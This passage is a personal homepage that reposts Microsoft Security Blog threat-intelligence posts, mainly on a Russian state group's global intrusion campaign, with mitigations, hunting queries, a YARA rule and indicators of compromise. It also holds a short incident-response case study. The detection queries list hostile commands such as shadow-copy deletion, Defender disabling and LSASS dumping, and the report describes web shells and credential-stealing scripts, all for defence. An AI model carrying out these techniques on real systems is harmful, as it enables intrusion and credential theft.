- JBOSS (exact CVE is unknown)

In nearly all cases of successful exploitation, Seashell Blizzard carried out measures to establish long-term persistence on affected systems. This persistent access is noted in at least three cases to have preceded select destructive attacks attributed to Seashell Blizzard, highlighting that the subgroup may periodically enable destructive or disruptive attacks.

Exploitation patterns

We have observed the initial access subgroup using three specific exploit patterns:

Deployment of remote management and monitoring (RMM) suites for persistence and command and control (February 24, 2024 – present)

In early 2024, the initial access subgroup began using RMM suites, which was a novel technique used by Seashell Blizzard to achieve persistence and command and control (C2). This was first observed when the subgroup exploited vulnerabilities in ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788). The subgroup then deployed RMM software such as Atera Agent and Splashtop Remote Services. The use of RMM software allowed the threat actor to retain critical C2 functions while masquerading as a legitimate utility, which made it less likely to be detected than a remote access trojan (RAT). While these TTPs have been used by other nation-state threat actors since at least 2022, including by Iranian state actor Mango Sandstorm, the Seashell Blizzard initial access subgroup’s specific techniques are considered distinct.

Figure 3. Use of ScreenConnect to install Atera Agent

During the first weeks of this exploitation pattern, the initial access subgroup primarily targeted organizations in Ukraine, the United States, Canada, the United Kingdom, and Australia. It is highly likely that Seashell Blizzard conducted post-compromise activity at only a limited number of organizations that were part of this initial victim pool. For these organizations, Seashell Blizzard conducted preliminary credential access through multiple means and deployed at least one custom utility to facilitate remote access and tunneling (see the section on ShadowLink below for more information).

Both CVE-2024-1709 and CVE-2023-48788 provided the ability to launch arbitrary commands on a vulnerable server. Following exploitation, the subgroup used two methods of payload retrieval to install RMM agents on affected servers:

Retrieval of Atera Agent installers from legitimate agent endpoints – Commonly observed on exploited ScreenConnect servers, Seashell Blizzard used resulting command execution to retrieve Atera installers via Bitsadmin and curl from legitimate installation URLs hosted by Atera.

Retrieval of Atera Agent from actor-controlled infrastructure – During exploitation of CVE-2023-48788 between April 9 and April 10, 2024, Seashell Blizzard retrieved remote agent installers from actor-controlled virtual private server (VPS) infrastructure.

Following installation of RMM software, Seashell Blizzard uses the native functionality of the agents to deploy secondary tools to help credential acquisition, data exfiltration, and upload of custom utilities to facilitate more robust access to compromised systems.

Seashell Blizzard likely uses three primary methods of credential access:

Registry-based credential access via reg.exe:

Credential access via renamed procdump:

Since RMM agents typically afford an interactive graphical interface, native credential access mechanisms common via task manager were likely also carried out. In addition, credential access via Taskmanager UI by LSASS process dumping was likely also employed.

During Seashell Blizzard intrusions, we observed rclone.exe deployed to affected servers and subsequently used to carry out data exfiltration using an actor-supplied configuration file.

Among a subgroup of victims, Seashell Blizzard carried out unique post-compromise activity, indicating that the threat actor sought more durable persistence and direct access. In these cases, Seashell Blizzard deployed OpenSSH with a unique public key, allowing them to access compromised systems using an actor-controlled account and credential, in addition to a unique persistence and assured C2 method known to Microsoft Threat Intelligence as ShadowLink.

Figure 4. How ShadowLink avoids discovery

ShadowLink facilitates persistent remote access by configuring a compromised system to be registered as a Tor hidden service. This is achieved using a combination of Tor service binaries and a unique actor-defined Tor configuration file (referred as the ‘torrc’) configuring the system for remote access. Systems compromised with ShadowLink receive a unique .onion address, making them remotely accessible via the Tor network. This capability allows Seashell Blizzard to bypass common exploit patterns of deploying a RAT, which commonly leverages some form of C2 to actor-controlled infrastructure that are often easily audited and identified by network administrators. Instead, by relying on Tor hidden services, the compromised system creates a persistent circuit to the Tor network, acting as a covert tunnel, effectively cloaking all inbound connections to the affected asset and limiting exposures from both the actor and victim environment.

ShadowLink contains two primary components: a legitimate Tor service binary and a torrc which contains requisite configurations for the Tor hidden services address—specifically, port-forwarding for common services such as Remote Desktop Protocol (RDP) and SecureShell (SSH) Protocol. Commonly, Seashell Blizzard has utilized ShadowLink to redirect inbound connections to the Tor hidden service address to ports for RDP (3389). ShadowLink persisted via a system service:

Microsoft Threat Intelligence has also observed Forest Blizzard, a separate GRU actor, leveraging similar Tor-based capabilities in their operations.

Web shell deployment for persistence and C2 (late 2021 – present)

Since late 2021, the Seashell Blizzard initial access subgroup has primarily deployed web shells following successful exploitation to maintain footholds and achieve the ability to execute commands necessary to deploy secondary tooling to assist lateral movement. To date, this exploit pattern remains its predominant persistence method. Beginning in mid-2022, this pattern of exploitation enabled unique post-compromise activities against organizations in Central Asia and Europe, which were likely intended to further Russia’s geopolitical objectives and preposition against select strategic targets.

Figure 5. Seashell Blizzard exploitation of CVE-2021-34473 and CVE-2022-41352 Exploitation of Microsoft Exchange and Zimbra vulnerabilities

Microsoft Threat Intelligence has identified at least two web shells consistently deployed by this initial access subgroup. While web shells can be deployed using a variety of methods, they are most often deployed following the exploitation of vulnerabilities allowing remote code execution (RCE) or achieving some level of arbitrary file upload. In the case of the initial access subgroup, we have observed web shells deployed following exploitation of vulnerabilities in Microsoft Exchange (CVE-2021-34473) and Zimbra (CVE-2022-41352). In cases where RCE is available, the initial access subgroup routinely retrieves web shells from actor-controlled infrastructure. This infrastructure can be either legitimate but compromised websites or dedicated actor infrastructure.

We observed the following web shell retrieval commands being used:

Microsoft Threat Intelligence has identified a web shell that we assess as exclusive to the initial access subgroup and is associated with the previously mentioned web shell retrieval patterns. Detected as LocalOlive, this web shell is identified on compromised perimeter infrastructure and serves as the subgroup’s primary means of achieving C2 and deploying additional utilities to compromised infrastructure. Written in ASPX supporting C#, the web shell carries sufficient yet rudimentary functionality to support the following secondary activities:

Upload and download files
Run shell commands
Open a port (default port is set to TCP 250)

Figure 6. LocalOlive web shell def.aspx

On October 24, 2022, the initial access subgroup successfully exploited CVE-2022-41352. This Zimbra Collaborative vulnerability allows a threat actor to deploy web shells and other arbitrary files by sending an email with a specially crafted attachment, effectively exploiting an arbitrary file-write vulnerability. The initial access subgroup leveraged this vulnerability to deliver a primitive web shell to affected servers, allowing for execution of arbitrary commands.

Emails were sent from the following actor-controlled addresses:

akfcjweiopgjebvh@proton.me
ohipfdpoih@proton.me
miccraftsor@outlook.com
amymackenzie147@protonmail.ch
ehklsjkhvhbjl@proton.me
MirrowSimps@outlook.com

Figure 7. Web shell used during Zimbra exploitation

Reconnaissance and fingerprinting

After deploying web shells, the initial access subgroup then executes specific sequential commands below likely used to fingerprint and attribute victim networks; these patterns of behavior may indicate that either operators are quick to capitalize on compromises or the possible use of automation following successful exploitation.

Tunneling utilities deployment

When Seashell Blizzard identifies targets of likely strategic value, it often furthers its network compromise by deploying tunneling utilities such as Chisel, plink, and rsockstun to established dedicated conduits into affected network segments.

When Chisel is deployed, it often followed multiple naming conventions, including:

MsChSoft.exe
MsNan.exe
Msoft.exe
Chisel.exe
Win.exe
MsChs.exe
MicrosoftExchange32.exe
Desk.exe
Sys.exe

For example, the initial access subgroup has used the following tunneling commands:

When rsockstun is deployed, it has used naming conventions such as Sc.exe.

Tunneling launch

When establishing tunnels, the initial access subgroup has routinely established reverse tunnels to exclusive VPS actor-owned infrastructure, including:

Tunneling IPFirst observed usedLast observed used103.201.129[.]130May 2022July 2022104.160.6[.]2September 2022December 2022195.26.87[.]209September 2023April 2024

Note that these IP addresses are relevant within or around the timeframes enumerated in the table above. Some IP addresses may no longer be used by Seashell Blizzard at the time of this writing but are provided for historical and forensic understanding.

Modification of infrastructure to expand network influence through credential collection (late 2021 – 2024)

In targeted operations where the initial access subgroup is likely seeking network access, Microsoft Threat Intelligence has observed subsequent malicious modifications to network resources including Outlook Web Access (OWA) sign-in pages and DNS configurations.

Figure 8. Simple attack chain for Seashell Blizzard exploitation of OWA

Modifying network resources allows Seashell Blizzard to passively gather relevant network credentials, which may be used to expand the actor’s access to sensitive information and widen its access to target networks in general. Notably, the infrastructure associated with this unique technique is sometimes also used in the two prior exploitation patterns, highlighting the versatility of late-stage infrastructure which may not always be limited to distinct patterns of exploitation.

Modification of web access sign-in portals

The initial access subgroup uses rogue JavaScript inserted into otherwise legitimate sign-in portals. This malicious JavaScript collects and sends clear text usernames and passwords to actor-controlled infrastructure as they are submitted in real time by users of the affected organization. We assess that this method has likely afforded the subgroup credentials to support lateral movement within several organizations.

Microsoft Threat Intelligence has tracked the following actor-controlled infrastructure linked to this unique credential collection method when modifying legitimate OWA sign-in pages:

hwupdates[.]com
cloud-sync[.]org
103.201.129[.]130

Figure 9. Seashell Blizzard credential collection from OWA Modification of DNS configurations

Microsoft Threat Intelligence assesses with moderate confidence that the initial access subgroup has modified DNS A record configurations for select targets. While the purpose of these modifications is unclear, due to the nature of affected systems, it is possible that they may have been purposed to intercept credentials from critical authentication services.

Conclusion

Given that Seashell Blizzard is Russia’s cyber tip of the spear in Ukraine, Microsoft Threat Intelligence assesses that this access subgroup will continue to innovate new horizontally scalable techniques to compromise networks both in Ukraine and globally in support of Russia’s war objectives and evolving national priorities. This subgroup, which is characterized within the broader Seashell Blizzard organization by its near-global reach, represents an expansion in both the geographical targeting conducted by Seashell Blizzard and the scope of its operations. At the same time, Seashell Blizzard’s far-reaching, opportunistic access methods likely offer Russia expansive opportunities for niche operations and activities that will continue to be valuable over the medium term.

Mitigation and protection guidance

To harden networks against the Seashell Blizzard activity listed above, defenders can implement the following:

Strengthen operating environment configuration

Utilize a vulnerability management system, such as Microsoft Defender Vulnerability Management, to manage vulnerabilities, weaknesses, and remediation efforts across your environment’s operating systems, software inventories, and network devices.
Require multifactor authentication (MFA). While certain attacks such as AiTM phishing attempt to circumvent MFA, implementation of MFA remains an essential pillar in identity security and is highly effective at stopping a variety of threats.
- Leverage phishing-resistant authentication methods such as FIDO Tokens, or Microsoft Authenticator with passkey. Avoid telephony-based MFA methods to avoid risks associated with SIM-jacking.
Implement Entra ID Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
Organizations can also use Microsoft Defender External Attack Surface Management (EASM) , a tool that continuously discovers and maps digital attack surface to provide an external view of your online infrastructure. EASM leverages vulnerability and infrastructure data to generate Attack Surface Insights, reporting that highlights key risks to a given organization.
Enable Network Level Authentication for Remote Desktop Service connections.
Enable AppLocker to restrict specific software tools prohibited within the organization, such as reconnaissance, fingerprinting, and RMM tools, or grant access to only specific users.

Strengthen Microsoft Defender for Endpoint configuration

Ensure that tamper protection is enabled in Microsoft Defender for Endpoint.
Enable network protection in Microsoft Defender for Endpoint.
Turn on web protection.
Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.    
Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume. 
Microsoft Defender XDR customers can turn on the following attack surface reduction rules to prevent common attack techniques used by threat actors.
- Block executable content from email client and webmail
- Block executable files from running unless they meet a prevalence, age, or trusted list criterion
- Block execution of potentially obfuscated scripts
- Block JavaScript or VBScript from launching downloaded executable content
- Block process creations originating from PSExec and WMI commands

Strengthen Microsoft Defender Antivirus configuration

Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
Enable Microsoft Defender Antivirus scanning of downloaded files and attachments.
Enable Microsoft Defender Antivirus real-time protection.
Turn on PUA protection in block mode in Microsoft Defender Antivirus

Strengthen Microsoft Defender for Office 365 configuration

Turn on Safe Links and Safe Attachments in Microsoft Defender for Office 365.
Enable Zero-hour auto purge (ZAP) in Microsoft Defender for Office 365 to quarantine sent mail in response to newly acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.
Invest in advanced anti-phishing solutions that monitor incoming emails and visited websites. Microsoft Defender for Office 365 merges incident and alert management across email, devices, and identities, centralizing investigations for email-based threats.
Configure Microsoft Defender for Office 365 to recheck links on click.
Use the Attack Simulator in Microsoft Defender for Office 365 to run realistic, yet safe, simulated phishing and password attack campaigns. Run spear-phishing (credential harvest) simulations to train end-users against clicking URLs in unsolicited messages and disclosing credentials.

Strengthen Microsoft Defender for Identity configuration

Prevent clear text credential exposure.
Reduce lateral movement paths that may be used by attackers.
Identify legacy components that may introduce security vulnerabilities.

Microsoft Defender XDR detections Microsoft Defender Antivirus

Microsoft Defender Antivirus detects this threat as the following malware:

HackTool:Win64/ShadowLink.A!dha
HackTool:Win64/ShadowLink.B!dha
Exploit:Python/CVE-2024-1709
Rnasom:Win32/Inc.MA
BackDoor:PHP/Remoteshell.V
Trojan:Win32/LocalOlive.A!dha
Trojan:Win32/LocalOlive.B!dha
Trojan:Win32/LocalOlive.C!dha

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:

Seashell Blizzard activity group

The following alerts might also indicate threat activity related to this threat. Note, however, these alerts also can be triggered by unrelated threat activity.

Possible Seashell Blizzard activity
Suspicious Atera installation via ScreenConnect
Suspicious command execution via ScreenConnect
Suspicious sequence of exploration activities
CredentialDumpingViaEsentutlDetector
Suspicious behavior by cmd.exe was observed
SQL Server login using xp_cmdshell
Suspicious port scan activity within an RDP session
Suspicious connection to remote service
Suspicious usage of remote management software
New local admin added using Net commands
Sensitive data was extracted from registry
Suspicious Scheduled Task Process Launched
Potential human-operated malicious activity
Compromised account conducting hands-on-keyboard attack
Sensitive file access for possible data exfiltration or encryption
Possible Fortinet FortiClientEMS vulnerability exploitation
Possible target of NTLM credential theft
Possible exploitation of ProxyShell vulnerabilities
Possibly malicious use of proxy or tunneling tool
Hidden dual-use tool launch attempt

Microsoft Defender for Cloud

The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

Communication with suspicious domain identified by threat intelligence
Suspicious PowerShell Activity Detected
Detected suspicious combination of HTA and PowerShell
Detected encoded executable in command line data
Detected obfuscated command line

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments. Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence to get more information about this threat actor.

Microsoft Defender Threat Intelligence

Hunting queries Microsoft Defender XDR

The following sample queries let you search for a week’s worth of events. To explore up to 30 days’ worth of raw data to inspect events in your network and locate potential PowerShell-related indicators for more than a week, go to the Advanced hunting page > Query tab, select the calendar dropdown menu to update your query to hunt for the Last 30 days.

ScreenConnect

Surface the possible exploitation of ScreenConnect to launch suspicious commands.

DeviceProcessEvents | where InitiatingProcessParentFileName endswith "ScreenConnect.ClientService.exe" | where (FileName in~ ("powershell.exe", "powershell_ise.exe", "cmd.exe") and ProcessCommandLine has_any ("System.DirectoryServices.ActiveDirectory.Domain", "hidden -encodedcommand", "export-registry", "compress-archive", "wget -uri", "curl -Uri", "curl -sko", "ipconfig /all", "& start /B", "start msiexec /q /i", "whoami", "net user", "net group", "localgroup administrators", "dsquery", "samaccountname=", "query session", "adscredentials", "o365accountconfiguration", "-dumpmode", "-ssh", "o or (FileName =~ "wget.exe" and ProcessCommandLine contains "http") or (FileName =~ "mshta.exe" and ProcessCommandLine contains "http") or (FileName =~ "curl.exe" and ProcessCommandLine contains "http") or ProcessCommandLine has_all ("powershell", "-command", "curl") or ProcessCommandLine has_any ("E:jscript", "e:vbscript", "start msiexec /q /i") or ProcessCommandLine has_all ("reg add", "DisableAntiSpyware", @"\Microsoft\Windows Defender") or ProcessCommandLine has_all ("reg add", "DisableRestrictedAdmin", @"CurrentControlSet\Control\Lsa") or ProcessCommandLine has_all ("vssadmin", "delete", "shadows") or ProcessCommandLine has_all ("vssadmin", "list", "shadows") or ProcessCommandLine has_all ("wmic", "process call create") or ProcessCommandLine has_all ("wmic", "delete", "shadowcopy") or ProcessCommandLine has_all ("wmic", "shadowcopy", "call create") or ProcessCommandLine has_all ("wbadmin", "delete", "catalog") or ProcessCommandLine has_all ("ntdsutil", "create full") or (ProcessCommandLine has_all ("schtasks", "/create") and not(ProcessCommandLine has "shutdown")) or (ProcessCommandLine has "nltest" and ProcessCommandLine has_any ("domain_trusts", "dclist", "all_trusts")) or (ProcessCommandLine has "lsass" and ProcessCommandLine has_any ("procdump", "tasklist", "findstr")) or FileName in~ ("tasklist.exe", "ssh.exe", "icacls.exe", "certutil.exe", "calc.exe", "bitsadmin.exe", "accesschk.exe", "mshta.exe", "winrm.exe", "dsquery.exe", "makecab.exe", "hh.exe", "pcalua.exe", "regsvr32.exe", "cmstp.exe", "esentutl.exe", "dnscmd.exe", "gpscript.exe", "msdt.exe", "msra.exe", "odbcconf.exe") | where not(ProcessCommandLine has_any ("servicedesk.atera.com", "support.csolve.net", "lt.tech-keys.com", "certutil -hashfile"))

FortiClient EMS log capture

If you believe your FortiClient has been exploited before patching, this query may help with further investigation.

According to Horizon3 research, the C:\Program Files (x86)\Fortinet\FortiClientEMS\logs log file can be examined to identify malicious activity. Run the following query to surface devices with this log file for further investigation.

DeviceFileEvents | where FileName contains @"C:\Program Files (x86)\Fortinet\FortiClientEMS\logs" | distinct DeviceName

Additionally, Horizon3 noted that this SQL vulnerability could allow for remote code execution (RCE) using the xp_cmdshell functionality of Microsoft SQL Server. The SQL logs can also be examined for evidence of xp_cmdshell being leveraged to spawn a Windows command shell.

According to Microsoft research, the following query could help surface exploitation activity related to this vulnerability.

DeviceProcessEvents | where InitiatingProcessFileName == "sqlservr.exe" | where FileName =~ "cmd.exe" | where ProcessCommandLine has_any ("webclient", "downloadstring", "http", "https", "downloadfile") | where InitiatingProcessCommandLine has_all ("sqlservr.exe", "-sFCEMS")

Tor service

Find services associated with Tor.

DeviceEvents | where ActionType == 'ServiceInstalled' | extend JSON = parse_json(AdditionalFields) | where JSON.ServiceName has 'tor'

YARA rule

Use the following Yara rule to find malicious JavaScript inserted into OWA sign-in pages.

rule injected_cred_logger_owa { strings: $owa = "<!-- OwaPa" $jq = "jquery" $ajax = ".ajax" $keypress = ".keypress" $which = "e.which == 13" $encoding1 = "btoa" $encoding2 = "unescape" $encoding3 = "encodeURIComponent" $m1 = "GET" $m2 = "POST" condition: $owa and $jq and $ajax and $keypress and $which and (2 of ($encoding*)) and (1 of ($m*)) } Microsoft Sentinel

While the below query is not linked to any specific threat actor, it is effective in surfacing network connectivity that may indicate use of remote monitoring and management program ScreenConnect. Implementing this query can help you stay vigilant and safeguard your organization from unauthorized use of RMM software:

ScreenConnect network connection

Below are the queries using Sentinel ASIM Functions to hunt threats across both Microsoft first-party and third-party data sources. ASIM also supports deploying parsers to specific workspaces from GitHub, using an ARM template or manually.

Below query can be used to hunt normalized Network Session events using the ASIM unifying parser _Im_NetworkSession for IOCs:

let lookback = 30d; let ioc_ip_addr = dynamic(["103.201.129.130", "104.160.6.2", "195.26.87.209"]); let ioc_domains = dynamic(["hwupdates.com", "cloud-sync.org"]); _Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now()) | where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains) | summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor

Below query can be used to hunt normalized Web Session events using the ASIM unifying parser _Im_WebSession for IOCs:

let lookback = 30d; let ioc_ip_addr = dynamic(["103.201.129.130", "104.160.6.2", "195.26.87.209"]); let ioc_url_patterns = dynamic(["hwupdates.com", "cloud-sync.org","def.aspx"]); _Im_WebSessionn(starttime=todatetime(ago(lookback)), endtime=now()) | where url has_any (ioc_url_patterns) or DstIpAddr has_any (ioc_ip_addr) | summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor Indicators of compromise IndicatorTypedef.aspxLocalOlive web shellakfcjweiopgjebvh@proton.meActor-controlled email addressohipfdpoih@proton.meActor-controlled email addressmiccraftsor@outlook.comActor-controlled email addressamymackenzie147@protonmail.chActor-controlled email addressehklsjkhvhbjl@proton.meActor-controlled email addressMirrowSimps@outlook.comActor-controlled email addressMsChSoft.exeChisel tunneling utilityMsNan.exeChisel tunneling utilityMsoft.exeChisel tunneling utilityChisel.exeChisel tunneling utilityWin.exeChisel tunneling utilityMsChs.exeChisel tunneling utilityMicrosoftExchange32.exeChisel tunneling utilitySc.exeRocstun tunneling utility103.201.129[.]130Seashell Blizzard infrastructure104.160.6[.]2Seashell Blizzard infrastructure195.26.87[.]209Seashell Blizzard infrastructurehwupdates[.]comSeashell Blizzard infrastructurecloud-sync[.]orgSeashell Blizzard infrastructurec7379b2472b71ea0a2ba63cb7178769d27b27e1d00785bfadac0ae311cc88d8bLocalOliveb38f1906680c80e1606181b3ccb8539dab5af2a7222165c53cdd68d09ec8abb0LocalOlive9f3d8252e8f3169751a705151bdf675ac194bfd8457cbe08e1f3c17d7e9e9be2LocalOlive68c7aab670ee9d7461a4a8f06333994f251dc79813934166421091e2f1fa145cLocalOliveb9ef2e948a9b49a6930fc190b22cbdb3571579d37a4de56564e41a2ef736767bChisel636e04f0618dd578d107f440b1cf6c910502d160130adae5e415b2dd2b36abcbLocalOlive148.251.53[.]222Seashell Blizzard infrastructure89.149.200[.]91 17738a27bb307b3cb7bd571934a398223e170842005f1725c46c7075f14e90feSeashell Blizzard infrastructurecab97e837a3fc095bf59703574cbfa7e60fb10991101ba9bfc9bbf294c18fd97LocalOlive References

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

The post The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation appeared first on Microsoft Security Blog.

Categories: Microsoft

Build a stronger security strategy with proactive and reactive incident response: Cyberattack Series

Microsoft Malware Protection Center - Mon, 02/10/2025 - 12:00pm

There are countless statistics about cybercrime and one of the most impactful is that for threat actors. Their profits continue to increase year over year and are on track to rise from $9.22 trillion in 2024 to $13.82 trillion by 2028.1 If the financial drain caused by threat actors were pooled it would be ranked as the third largest gross domestic product (GDP) by country, trailing behind the number two spot, which is China at $18.27 trillion.2

That statistic alone tells us a great deal about the importance of preparedness for a potential cyberattack, which includes a robust incident response plan. To create such a plan, it is critical to understand potential risks, and one of the best ways to do that is to conduct a proactive threat hunt and compromise assessment.

Microsoft Incident Response is made up of highly skilled investigators, researchers, engineers, and analysts who specialize in handling global security incidents. In addition to reactive response, they also conduct proactive compromise assessments to find threat actor activity. They’ll provide recommendations and best practice guidance to strengthen an organization’s security posture.

Microsoft Incident Response

Your first call before, during, and after a cybersecurity incident.

Microsoft Incident Response compromise assessments utilizes the same methodology and resources as those used in an investigation but without the time pressure and crisis-driven decision making associated with a live cyberattack. Compromise assessments are often used by those who have had a prior incident and want to measure their security posture after the implementation of new security measures. Some customers use the service as an annual assessment prior to locking down change controls. Others may use it to assess the environment of an acquisition prior to joining infrastructures.

What happens when a compromise assessment turns into a reactive incident response engagement? Let’s dive into a recent situation where our team encountered this very scenario.

Why differentiate between proactive and reactive investigations?

What are indicators of compromise?

It is important to understand the key differences between proactive and reactive investigations, as each has different goals and measures for success. Microsoft Incident Response’s proactive compromise assessments are focused on detection and prevention, which includes identifying potential indicators of compromise (IOCs), bringing attention to potential vulnerabilities, and helping customers mitigate risks by implementing security hardening measures.

Our reactive investigations are centered on incident management during and immediately after a compromise, including incident analysis, threat hunting, tactical containment, and Tier 0 recovery, all while under the pressure of an active cyberattack.

Proactive and reactive incident response are essential capabilities for providing a more robust defense strategy. They enable an organization to address an active cyberattack during a period when time and knowing the next steps are critical. At the same time, it provides experts with the experience needed to help prevent future incidents. Not all organizations have the resources required to maintain an incident response team capable of proactive and reactive approaches and may want to consider using a third-party service.

The importance of Microsoft’s “double duty” incident response experts

When confronted by an active threat actor, two things are at the forefront of success and can’t be lost—time and knowledge.

While conducting a proactive compromise assessment for a nonprofit organization in mid-2024, Microsoft Incident Response began their forensic investigation. Initially identifying small artifacts of interest, the assessment quickly changed as suspicious events began to unfold. At the time the threat actor was not known, but has since been tracked as Storm-2077, a Chinese state actor that has been active since at least January 2024. Storm-2077’s techniques focus on email data theft, using valid credentials harvested from compromised systems. Storm-2077 was lurking in the shadows of the organization’s environment. When they felt they had been detected, these threat actors put their fingers on keyboards and started making moves.

Precious time to remediate was not lost. Microsoft Incident Response immediately switched from proactive to reactive mode. The threat actor created a global administrator account and began disabling legitimate organizational global administrator accounts to gain full control of the environment. The targeted organization’s IT team was already synchronized with Microsoft Incident Response through the active compromise assessment that was taking place. The targeted customer took note of the event and came to Microsoft for deconfliction. Once the activity was determined to be malicious, the organization’s IT team disabled the access, and the proactive incident response investigation converted to being reactive. The threat actor was contained and access was remediated quickly because of this collaboration.

The threat actor had likely been present in the organization’s environment for a few months or more. They had taken advantage of a stolen session token to conduct a token replay attack, and through this had gained access to multiple accounts.

Proactive assessments that don’t utilize reactive investigation teams for delivery may result in a delay in responding or even generate more challenges for the incoming investigation team.

Thankfully, Microsoft Incident Response conducts proactive compromise assessments with the same resources that deliver reactive investigations. They can take immediate action to halt active cyberthreats before they do more harm.

Read the report to go deeper into the details of the cyberattack, including Storm-2077 tactics, the response activity, and lessons that other organizations can learn from this case.

Explore Microsoft Incident Response services What is the Cyberattack Series?

With our Cyberattack Series, customers will discover how Microsoft Incident Response investigates unique and notable attacks. For each cyberattack story, we will share:

How the cyberattack happened.
How the breach was discovered.
Microsoft’s investigation and eviction of the threat actor.
Strategies to avoid similar cyberattacks.

Learn more

To learn more about Microsoft Incident Response capabilities, please visit our website, or reach out to your Microsoft account manager or Premier Support contact.

Download our Unified Security e-book to learn more about how Microsoft can help you be more secure.

1Cybercrime Expected To Skyrocket in Coming Years, Statista. February 22, 2024.

2World GDP Rankings 2024 | Top 10 Countries Ranked By GDP, Forbes India. November 4, 2024.

The post Build a stronger security strategy with proactive and reactive incident response: Cyberattack Series appeared first on Microsoft Security Blog.

Categories: Microsoft

Biographical Information Summary - This is Just a Summary Joe Pearce
About Joe Pearce joeintenn
Links Joe Pearce
Flounder's Keylime Pie is the Best in the World, At Least I Think So... Joe Pearce
Harley Ride Joe Pearce
Cobra with New Cover Joe Pearce
Mustang Cobra After Ceramic Coating Joe Pearce
Carter County Cruise In Joe Pearce
2003 Ford Mustang SVT Cobra Convertible NAPA Auto Car Show Top 10 Joe Pearce
Ponies in the Smokies - Mustang Trophy Joe Pearce

Microsoft

Women’s History Month: Why different perspectives in cybersecurity and AI matter more than ever before

Malvertising campaign leads to info stealers hosted on GitHub

Silk Typhoon targeting IT supply chain

Securing generative AI models on Azure AI Foundry

Rethinking remote assistance security in a Zero Trust world

Microsoft at Legalweek: Help safeguard your AI future with Microsoft Purview

Microsoft is named a Leader in the 2025 Gartner® Magic Quadrant™ for cyber-physical systems protection platforms

Join us for the end-to-end Microsoft RSAC 2025 Conference experience

Storm-2372 conducts device code phishing campaign

Securing DeepSeek and other AI systems with Microsoft Security

The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation

Build a stronger security strategy with proactive and reactive incident response: Cyberattack Series

Welcome to Joe Pearce's Home Page.

Web page offered by Joe Pearce © 2004 - 2025 - All rights reserved.

Thanks to the ETSU Computer and Information Sciences Department.

Thanks to the NSTCC Computer and Information Sciences and Computer Engineering Technologies Department.

This is my Favicon.

You are here

Microsoft

Welcome to Joe Pearce's Home Page.

Web page offered by Joe Pearce © 2004 - 2025 - All rights reserved.

Thanks to the ETSU Computer and Information Sciences Department.

Thanks to the NSTCC Computer and Information Sciences and Computer Engineering Technologies Department.

This is my Favicon.